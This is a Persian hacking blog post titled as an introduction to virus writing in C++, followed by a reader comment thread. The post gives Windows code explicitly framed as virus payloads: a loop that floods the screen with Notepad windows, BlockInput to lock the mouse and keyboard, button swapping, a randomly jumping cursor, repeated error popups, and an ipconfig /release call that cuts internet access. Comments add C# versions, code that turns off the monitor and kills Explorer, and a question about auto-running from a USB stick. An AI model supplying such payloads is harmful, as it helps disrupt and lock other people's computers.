شروع ویروس نویسی با سی پلاس پلاس :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۲ مرداد ۰۲، ۰۰:۳۴ - Sami
    مرسی
  • ۱۴ مرداد ۰۲، ۱۴:۴۶ - farhad
    salam

ویژوآل استدیو تون رو استارت کنید و بر روی  New Project کلیک کنید و از صفحه باز شده کشوی Visual C++ را باز کنید و بر روی Win32  کلیک کنید و در نهایت در کادر سمت راستی Win32 Console Application را انتخاب کنید

نام و مسیر برنامه ای که میخوایید بسازید رو تعیین کنید و بر روی Ok کلیک کنید

بعد هم بر روی finish کلیک کنید تا به صفحه کد نویسی روبرو شین

اگه اسم فایلتون اسمی باشه که من انتخاب کردم کدهای زیر رو در صفحه تون میبینید

// Virus32.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"


int _tmain(int argc, _TCHAR* argv[])
{
return 0;
}

خط های سبز رنگ فقط برای توضیح هستن و هیچ عملی رو انجام نمیدن که با دوتا اسلش // شروع میشن

#include "stdafx.h"

اینم همون کتاب خونه است که در سی شارپ با Using شروع میشد

سی پلاس پلاس هم مثل سی شارپ کتابخونه های زیادی داره که هرکدوم کاربرد های خاص خودش رو داره

اکثر ما میدونیم که در اولین قدم برنامه نویسی با چیزی به نام الگوریتم روبرو میشیم

اینجا قرار نیست چیزهای ساده ای مثل الگوریتم رو تکرار کنیم فقط کافیه بدونید

#include ... کتابخونه ها
int _tmain(int argc, _TCHAR* argv[]) شروع بخش اصلی
{
کدها
}

الگوریتم ویروس نویسی مون فعلا فقط همینی هست که میبینید

از کدهای خیلی ساده شروع میکنیم تا برسیم به کدهای خیلی پیشرفته

در این پست برای رفع کوتی چند تا کد تایپ میکنم تا هم بحثمون زیاد سرد نباشه هم یه تستی کرده باشین


همونطور که گفتم ویروس از کدهای کاربردی تشکیل میشه

مثل خط زیر

ShellExecute(NULL, L"open", L"notepad.exe", NULL, NULL, SW_MAXIMIZE);

اینجا دستور اجرا شدن برنامه نوت پد رو در حالت ماکزیمم دادیم

از این خط بیشتر برای نمایش اطلاعات جزئی Info یا Reade me ها در برنامه های کاربردی استفاده میشه

با این کد میشه یه ویروسی به اسم Note Pad Bomber ساخت 

ابتدا کتابخونه زیر رو اضافه کنید

#include <Windows.h>

حالا اگه کد بالا رو به شکل زیر در یه حلقه قرار بدیم

int i;
for (i = 0; i < 10; i++) {
ShellExecute(NULL, L"open", L"notepad.exe", NULL, NULL, SW_MAXIMIZE);
}
return 0;

با اجرا شدن ویروسمون بصورت متوالی نوت پد رو اجرا میکنه

اینجا دستور اجرا شدن نوت پد رو برای ده بار دادیم تا بتونیم راحت تر تستش کنیم ما میتونیم بجای ده از عددهای بزرگتر دیگه ای استفاده کنیم تا صفحه با برنامه نوت پد بمباران بشه


ما میتونیم در ویروسمون از غیر فعال کردن ماوس و کیبورد هم استفاده کنیم
BlockInput(true);
Sleep(6000);
return 0;
برنامه باید با ادمین Run as Administrator  اجرا بشه
اینجا از 6000 استفاده کردیم تا برای 6 ثانیه ماوس و کیبوردمون غیر فعال بشه میتونیم از عدد بزرگتری استفاده کنیم

میتونیم جای دکمه های ماوس رو عوض کنیم
کلیک راست بجای کلیک چپ و برعکس
SwapMouseButton(true);
return 0;
نیازی به سطح ادمین نداره
برای بازگشت به حالت اولیه کافیه بجای true عبارت false رو قرار بدین و برنامه رو دوباره استارت کنید

میتونیم یه ماوس وحشی برای ویروسمون تعریف کنیم
int i, x, y;
for (i = 0; i < 201; i++) {
x = rand() % 1001;
y = rand() % 801;
SetCursorPos(x, y);
Sleep(200);
}
return 0;
نیازی به سطح ادمین نداره
اشاره گر ماوس در هر لحظه در مکان های مختلفی دیده میشه و غیر قابل کنترل میشه
برای غیر فعال کردنش از کلید های ترکیبی Alt + ctrl + delete استفاده کنید تا برین به تسک منیجر و از اونجا غیر فعالش کنید

میتونیم یه صفحه اینترنتی رو بصورت متوالی به نمایش بزاریم
ShellExecute(NULL, L"open", L"http://www.virus32.blog.ir", NULL, NULL, SW_MAXIMIZE);
return 0;
برای تستش خط دوم یعنی return 0 رو ابتدا حذف کنید تا ویروسمون فقط یکبار این صفحه رو نشون بده
میتونیم مثل جریان نوت پد این کد رو درون یه حلقه قرار بدیم یا اینکه ....

میتونیم یه پیام خطا رو بصورت متوالی به کاربر نمایش بدیم
MessageBox(NULL, TEXT("Error loading Virus32 for your system"), TEXT("Error"), MB_OK | MB_ICONEXCLAMATION);
return 0;
این کد هم مثل کد بالا ابتدا برای تست خط دومش رو پاک کنید

کد آخر هم برای قطع کردن اینترنت
system("ipconfig /release");
return 0;


بهتره دوباره یادآوری کنم
بی گدار به آب نزنید ، برای تست کردن این کدها ابتدا خوب دقت کنید ببینید باید چیکار کنید
کدهایی که در این پست نوشتم زیاد خطرناک نیستن به شرطی که جوری که گفته شده تستشون کنید
دقت کنید اگه اشتباه کنید ممکنه به سی پی یو یا رم سیستمون آسیب جدی وارد بشه
در هر صورت اگه یوقت اشتباه کردین و نتونستین جلوی اجرا شدن حلقه ها رو بگیرین سریعاً سیستمتون رو خاموش کنید (رستارت بدین)
دوباره میگم ادمین های این وب هیچ مسئولیتی در قبال پیامد های این آموزش ها نخواهند داشت
در پست های آینده با ویروس های بیشتری آشنا خواهیم شد :)
پیروز باشید

نظر (۳۶)

سلام دوباره به ویروس جوون و مستر کدر عزیز و بقیه دوستان
ویروس جوون دمت گرم خیلی وقت بود که منتظر پست ویروس نویسی بودم ولی میخواستم ازت خواهش کنم با ما سی شارپ بیشتر کارکنی. من تازه بهش علاقه مند شدم.
خیلی ممنون از وب عالیت
دوستتون دارم
با تشکر
Virus32 Virus 32 :
سلام عزیز
باشه با سی شارپ هم کار میکنیم
چون قسمت سی پلاس پلاس خالی بود گفتم یه مدت هم درباره این زبان بنویسم دا :)
داداش سلام
داداش من همشونو تونستم با سی شارپ بنویسیم به جز او قسمت ماوس وحشی ، که اونم همین جا به سی شارپ توضیحشو بدی ممنون میشم
Virus32 Virus 32 :
سلام
ای بابا میخواستیم با سی پلاس پلاس مانور بدیمااااا :)
تو سی شارپ یکم کداش بیشتر میشه
ابتدا کتابخونه زیر رو اضافه کن
using System.Threading;
بعد کدهای زیر رو
[DllImport("user32.dll")]
[return: MarshalAs(UnmanagedType.Bool)]
بعد از کدهای زیر اضافه کن
public partial class Form1 : Form
{
حالا برای فرم لود یا دکمه ات کدهای زیر رو بنویس
int i, x, y;
Random rnd = new Random();
for (i = 0; i < 201;)
{
x = rnd.Next(1001);
y = rnd.Next(801);
SetCursorPos(x, y);
Thread.Sleep(200);
i++;
}
میشه از حلقه های شرطی هم استفاده کرد که ...
یادت باشه برای ویروس بجای 201 از عدد بزرگتری استفاده کنی بهتره

مرسی داداش از راهنماییت
من کدارو این اوجوری نوشتم ریختم تو یه تایمر به نظرت خوبه ؟؟

()Random X = new Random
Cursor.Position=new Point ( X.next(700) , X.next (500 ) ) l


Virus32 Virus 32 :
آره این جوری خیلی بهتره
Random X = new Random();
Cursor.Position = new Point(X.Next(700), X.Next(500));

بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
salam virus
omidvaram halet top bashe :D in mah kolan vaghtam azade goftam age salah bedoni to blog amoozesh besazam ia to system khodam besazam barat emailesh konam

telegram : ************* virus ino * kon
Virus32 MR_C0D3R ‌ :
سلام
ویروس تلگرام نمیاد منم تلگراممو پاک کردم
ای کاش با آی پی خودت کامنت میذاشتی
چون میخواستم نام کاربریتو بگیرم و ادمینت کنم و ....
اما الان چون با آی پی خودت نیومدی بعدا اگه مشکلی پیش بیاد
میفته گردن من ...
با آی پی خودت نام کاربریتو بده
یا اینکه به ایمیلم ارسال کن
تو کد ویروس موس وحشی

مقدار sleep رو کنید 5

بعد تو for بین () بنویسید ;;

اونایی که با gcc ویندوز این کدو کمپایل می کنند کتابخانه های stdafx.h و

targetver.h
رو به lib های gcc تو درایو c اضافه کنند .


Virus32 MR_C0D3R ‌ :
مورد یک نیازی نیست و منظورتو از مورد دوم نفهمیدم
اما برای مورد آخر اینکه stdafx یکی از کتابخونه های ویژوال استدیو هستش
یعنی مثلا این کدهارو بخوایم توی یدونه ابزار کد نویسی دیگه استفاده کنیم باید اونو پاکش کنیم
اما بعضی از کدها که توی این پست نوشتیم وقتی تست کردم روی کد بلاکس کار نکرد که همین باعث شد منم بعد از مدت ها ویژوال نصب کنم
و نتونم با اون ترفند کوچیک حذف کردن stdafx این محدودیت رو دور بزنم و ...
پیشنهاد میکنم به جای ابزارای کد نویسی دیگه از ویژوال استدیو استفاده کنین که به مشکل نخورین
سلام
میشه اموزش کامپایل c و c++ به dll بزاری؟ ممنون
Virus32 MR_C0D3R ‌ :
سلام
بلد نیستم
چرا با C نمینویسی بجای Cpp ؟ یه تنوعی هم میشه D:
یه توضیحی در باره bat میدید من نفهمیدم یعنی چی من یه چیز های خیلی خیلی کمی درباره سی پلاس پلاس میدونم bat چه ربطی به سی پلاس پلاس داره نفهمیدم 
Virus32 Virus 32 :
اینجا رو بخون
سلام داداش عشقی میگم میتونی خاموش شدن مانیتور را تو سی شارپ هم بگی و این که تو کامنت ها که موس وهشیرا گفتی جواب نمیده 2تا خط [DllImport("user32.dll")]
[return: MarshalAs(UnmanagedType.Bool)]
را ارور میده تلگرام داری؟ یا ایمیل؟ 
Virus32 MR_C0D3R ‌ :
سلام
برای سوال اولت
اول کتابخونه ی پایین رو ادد کن
using System.Runtime.InteropServices;
بعدا برو اینجا ( یعنی زیر پرانتز )
public partial class Form1 : Form
    {
و کدهای پایین رو اضافه کن
        [DllImport("user32.dll", CharSet = CharSet.Auto)]
        private static extern int SendMessage(IntPtr hWnd, int wMsg, IntPtr wParam, IntPtr lParam);
حالا برو توی Form Load یا رویداد دکمت
و کد پایین رو اضافه کن
Form f = new Form();
            bool turnOff = true;
            SendMessage(f.Handle, 0x112, (IntPtr)0xF170, (IntPtr)(turnOff ? 2 : -1));
تو خط دوم اگه true باشه مانیتور خاموش و اگه false باشه مانیتور روشن میشه
و اما برای سوال دومت
تکه کد پایین رو اضافه کن به خط آخر کدایی که زیر پرانتز قرار میگیره
        static extern bool SetCursorPos(int x, int y);
جفتشم دارم
اما جواب هیچکسو نمیدم :|
فقط نصب کردم برم جوک بخونم D:
میگم ببخشید میتونی تو تلگرامم این موس وحشی و مانیتور را بدی؟ ❤️
https://t.me/SAMANBA8181
Virus32 MR_C0D3R ‌ :
نه متاسفانه
آی دیتو میزارم باشه که اگه کسی دلش برات سوخت بفرسته D:
اقا اینو تو dev اشکال میگیره
BlockInput(true);
Sleep(6000);
return 0;
Virus32 MR_C0D3R ‌ :
از این‌ :
#include <winable.h>
به جای این استفاده کن‌‌ :
#include <windows.h>
برای اینکه درست کار کنه
در آخر باید بعد از اینکه خروجی گرفتی برنامتو با دسترسی ادمین اجرا کنی
مشکلم حل نشد
http://s8.picofile.com/file/8366866242/Capture.JPG
Virus32 MR_C0D3R ‌ :
منظورم این نبود که کلا Windows.h رو هم پاکش کنی
الان به Sleep گیر داده که برای کار کردنش باید کتابخونه ی Windows.h هم باید قرار بگیره
کدر من همون مشکل رو دارم dev اشکال میگیره
Virus32 MR_C0D3R ‌ :
عزیز من Dev رو هم نصب کردم
کدهارو عین همین استفاده میکنم و فقط یه خرده بعضیاشو عوض میکنم هیچ مشکلی هم پیش نمیاد
تو پست مقدمات ویروس نویسی گفتیم از ویژوال استفاده کنین دیگه
خب وقتی استفاده نمیکنین پس باید خودتون هم دنبال دستکاری کدها باشید
الان شما کدوم رو مشکل داری تا عینا تو Dev بنویسم و بدم دستت تا ببینی اوکی هستش ؟
اگه هیچ کدی داخل Dev کار نمیکنه مطمئن شو که کامپایلر هم نصب شده باشه
اگرم بعضی کدها کار میکنن و بعضیاشم نه
بهم بگو تا بهت بگم چی بنویسی تا کار کنه :|
سلام ممنون کدر جان
اینو میگم دیگه---هرکاری بگی کردم از کتابخونه تا......
BlockInput(true);
Sleep(6000);
return 0;
Virus32 MR_C0D3R ‌ :
سلام
کاری رو که میگم به ترتیب انجام بده
1 - Dev رو رووش کلیک راست کن و گزینه ی Run as administrator رو انتخاب کن .
2 - یه پروژه از نوع کنسولی ایجاد کن و مسیر ذخیره سازیشو دسکتاپت انتخاب کن .
3 - وارد Main.cpp شو و کد پایین رو داخلش قرار بده
#include <iostream>
#include <windows.h>
#include <winable.h>

using namespace std;

int main()
{
BlockInput(true);
Sleep(6000);
return 0;
}
4 - کلید F-11 رو از روی کیبوردت انتخاب کن و منتظر کامپایل و اجرا بمون
جواب گرفتی خبرشو بدی
ولی جواب نداد من دیگه نمیدونم چون عینا همین کار رو کردم درست کار کرد
مشکل اصلیش فکر کنم از این بود که شما Dev رو با دسترسی ادمین اجرا نمیکردی...
به خدا همشو انجام دادم نمیشه
اینو اشکال میگیره
BlockInput
Virus32 MR_C0D3R ‌ :
دستور پایین رو اجرا کن ببینم :|
#include <iostream>

using namespace std;

int main(){
cout << "myTest" << endl;
}
اگه درست کار کرد یعنی کامپایلرت درست هستش و یکسری توابع ویندوزیش مشکل داره
اگرم کار نکرد یعنی مشکل از کامپایلره که نصب نشده
پیشنهاد میکنم از آخرین نسخه Dev استفاده کنی...
توی گوگل بصورت خارجی بنویس :
Download Dev-Cpp 5.11 TDM-GCC 4.9.2 Setup
بعد از داخل سایتایی که فیلتر نیستن
اسمی که مطابق اسم ذکر شده بود رو دانلود کن
مطمئنم درست میشه
اگه درست نشد دیگه نمیدونم D:
اگرم درست شد خبرشو بده
سلام اون کد که گفتی کار کرد 
نوشت mytest
کامپایلرم درسته کد رو اشکال میگرفت
Virus32 MR_C0D3R ‌ :
کار دیگه ای که گفتم رو انجام دادی تست کنی ؟
بنظر من کدبلاکس خوبه تو قدیمیا...
ولی سلیقست دیگه...
اگه خواستی آخرین نسخه همون Dev رو دانلود کن
سلام واقعا ممنون
درست شد وقتی نسخه جدید نصب کردم
دستت طلا...............
Virus32 MR_C0D3R ‌ :
سلام
خدارو شکر D:
اصلا خیلی خوشحال شدم
برات نذر کرده بودم مشکلت حل شه :))
سلام من هرکاری کردم نتونستم معنی return 0; رو بفهمم
Virus32 MR_C0D3R ‌ :
برای برگردوندن یه مقدار استفاده میشه
توی اینجا کاربرد خاصی نداره
کاربرد اصلی اینا توی متدنویسی هستش
میتونیم یه مقداری رو از یه تابع برگردونیم تو تابع اصلی و یه کارایی رو انجام بدیم
مثلا داخل تابع دستور جمع دو متغیر رو با return برگردونیم و داخل برنامه چاپ کنیم
سلام ، خسته نباشید ... من تازه به مبحث ویروس نویسی علاقمند شدم ... چیز باحالیه در کل :-) ... میخواستم بدونم کانال  تلگرام  هم دارید ک توش یاد بدید ویروس نویسی ؟ ...
دمتون گرم بابت آموزشها :-)
Virus32 MR_C0D3R ‌ :
سلام ، نه عزیز
فقط همینجارو داریم برای آموزش
توی کانال تلگراممون فقط لینک آموزشهارو قرار میدیم
hwin چیه؟
Virus32 MR_C0D3R ‌ :
اونا یکسری توابع ویندوزی هستن
موقعی که بخوای برنامه نویسی API یاد بگیری خودت اونارو درک میکنی
چون من اگه بخوام توضیح بدم طولانیه بحثش
اگه بطور ساده بخوام توضیح بدم
میشه گفت برای کار با پنجره ها تو برنامه نویسی هستش
مثلا توی یکی از همین پست های ویروس نویسی از HWND استفاده کردیم و مقداری به نام hWin تعریف کردیم و پنجره رو مخفی کردیم
راستی کدر یادته تو بت فایل ها ما با دستور title اسم برنامه رو میزاشتیم
تو سی پلاس پلاس چی میشه
Virus32 MR_C0D3R ‌ :
توی برنامه های گرافیکی سی پلاس پلاس به این شکل هستش
    hwnd = CreateWindowEx(
        WS_EX_CLIENTEDGE,
        g_szClassName,
        "ViRus32",
        WS_OVERLAPPEDWINDOW,
        CW_USEDEFAULT, CW_USEDEFAULT, 240, 120,
        NULL, NULL, hInstance, NULL);
اما تو بیشتر برنامه های کنسولی از تابع system استفاده میشه که برای اجرای دستورات خط فرمان هستش
system("Title ViRus32");
که توی هر دو روش ViRus32 میشه مقدار مد نظر ما
راستی رفتم تحقیق کردم دیدم نرم افزار dev c++ رو با پابتون نوشتن!!!!چرا؟؟؟کلا سی پلاس پلاس نابود شد ):
Virus32 MR_C0D3R ‌ :
تا جایی که من اطلاع دارم dev با دلفی نوشته شده
اما حالا شما میگی با پایتون نوشته شده مام میگه باشه با پایتون نوشته شده :)
ولی پیشنهاد میکنم یه سر به ویکی پدیاش بزنی
مهم نیست ابزارش به چه زبانی نوشته شده
مهم درون اون هست ( کامپایلرش )
پس چرا نصب میکنی فایل هاش که نصب میشه .py هست
Virus32 MR_C0D3R ‌ :
-_-
بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
این شخصیه سانسور میکنی...




**** ****** ** **** **** ** *** *** **** *** ******* * *** ****** **** **** ****** ***** *** **** ****** ******
**** ****
Virus32 MR_C0D3R ‌ :
ایده جالبیه
شروع کن اگه کمک خواستی
اگر تونستم در خدمتیم :)
برنامه نویس ها بهش پاسخ مثبت میدن؟
Virus32 MR_C0D3R ‌ :
نمیدونم....
اگر عملی شد میای؟
Virus32 MR_C0D3R ‌ :
نه متاسفانه
برای چی مگه برنامه نویس نیستی؟
Virus32 MR_C0D3R ‌ :
نه کی گفته من برنامه نویسم ؟ حتما یه دلیل شخصی دارم دیگه...
شیطون شدی کدر :)
فتا دنبالته؟
راستی شنیدم ویروسو گرفتن اره؟
برای چی اخه؟
Virus32 MR_C0D3R ‌ :
نه فتا دنبالم نیست
ویروس هم الان چند سال و چند ماه هستش که داره کار خودشو میکنه
بنظرت بهتر نیست تو مسائل دیگران سرک نکشی ؟ شاید خوششون نیاد :)

خوب بابا چرا تند میری؟!

سلام

اون return 0; برا چیه چرا باید صفرو برگردونیم ؟

 

Virus32 MR_C0D3R ‌ :
اون وقتی آخر برنامه میاد
یعنی برنامه تموم شده ...
هم میتونه باشه و هم میتونه نباشه
من بیشتر تو تابع نویسی ازش استفاده میکنم

سلام 

میخاستم اگه میشه 

ویروس نویسی رو یادم بدید

 

 

  • Virus32
  • پویا روزامید
  • کدر جان

    اگه بخوای بجای notepad یه برنامه دیگه ای ران بشه چیکار کنیم؟

    Virus32 MR_C0D3R ‌ :
    اونموقع به جای Notepad.exe اسم برنامه ی مد نظر رو مینویسیم
    مثلا Calc.exe و غیره...

    سلاممممم ومممنون از سایت 

    یک سوالی 

    برای بستن یک برنامه مثلا اکسپلورر از چه کدی میشه استفاده کرد توی سی پلاس پلاس ؟ 

    توی سایت مایکروسافت که زدم EndTask و WM_CLOSE رو اورد ولی نفهمیدم که چه شکلی ازش میشه استفاده کرد 

    میشه یک مثال برای مثلا مثلا همین اکسپلورر بزنی بقیشو خودم میفهمم

    Virus32 Virus 32 :
    سلام
    بستن اکسپلورر به کمک کد نویسی در سی پلاس پلاس c++
    BOOL ExitExplorer()
    {
    HWND hWndTray = FindWindow(_T("Shell_TrayWnd"), NULL);
    return PostMessage(hWndTray, 0x5B4, 0, 0);
    }

    سلام یک سوال داشتم برای اجرای کد ها حتما باید با ویژال اون هارو وارد کنیم یا داخل کد بلاکس و .... هم میشه

    Virus32 ولم کنید (: :
    فرق های ریزی دارن ولی اوکیه

    سلام خسته نباشید میشه منظورتو رو از Run as Administrator بگین که چیه اصلا

    چطوری باید استفادش کرد اصلا کجا قرار داره واینکه کلا چی هست رو بگین 

    Virus32 Virus 32 :
    سلام ممنون
    شما که الان دارین از سیستمون استفاده میکنید به عنوان یک کاربر معمولی هستین
    یعنی ویندوز بصورت خودکار و پیش فرض یک سری دسترسی هاشو از شما گرفته (برای امنیت شما)
    این سطح دسترسی ها admin , user و ... هست که لول های مختلف خودش رو داره
    بالاترین سطح admin یا administrator هست
    ویروس ها یا بعضی نرم افزارها برای دسترسی به تمام امکانات نیاز دارن که با این سطح اجرا بشن
    برای اجرا کردن یک فایل با این سطح دسترسی
    ساده ترین روش کلیک راست کردن روی فایل مورد نظر و انتخاب گزینه ی Run as Administrator هستش

    سلام میگم چجوری میشه کاری کرد که به محض اینکه وارد سیستم شد (به هر روشی مثلا فلش) ران شه؟

    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی